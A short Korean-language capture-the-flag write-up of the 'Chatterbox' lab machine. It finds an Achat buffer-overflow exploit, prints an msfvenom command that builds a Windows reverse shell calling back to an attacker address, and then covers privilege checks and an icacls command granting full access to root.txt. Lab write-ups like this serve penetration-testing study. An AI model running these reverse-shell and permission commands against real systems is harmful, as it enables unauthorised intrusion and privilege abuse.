chatterbox 롸업 정리

nmap

결과 죽어도 안나온다....

박스가 죽은건지,,, 삽질하다가 그냥 롸업에 나온 nmap 결과보고 익스해본다.

---

searchsploit achat

딱봐도 첫 번째걸 봐야겠지? 여기서 눈에 띄는 부분이 있다. 

- payload의 length가 1152보다 크면 안되는 것 같다. 이보다 작은 크기의 리버스쉘을 생생해서 buf 대신 넣으면 될 듯

- msfvenom으로 리버스쉘 만드는 옵션 다 줬다. 

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

그대로 익스했더니 쉘 따졌다

---

권한 상승

net user

three users. 우리는 Administrator 권한을 얻고 싶다. 

그리고 alfred 권한에게 유효한 시스템 권한을 확인한다. whoami /priv

SetImpersonatePrivilege가 not enabled이므로 juicy potato를 사용할 수 없다. 

 

systeminfo를 확인한다. 아래를 보고 kernel exploit이 불가능하다고 판단한다. 

 

---

 

root.txt가 있는 디렉터리로 간다. 

권한 확인하기 : icacls <file/dir name>

Administrator만 full access가 가능하다. 

alfred도 full access인 것을 볼 수 있다. The Alfred user is also configured to own the root.txt file.

dir /q : 파일 소유권 정보를 표시한다. 

파일 소유자는 alfred인데 full access는 Administrator만 가능하다는 말인가...???

 

icacls root.txt /grant alfred:F -> alfred에게 F(full) 권한 주기

icacls root.txt -> 방금 준 권한 확인하기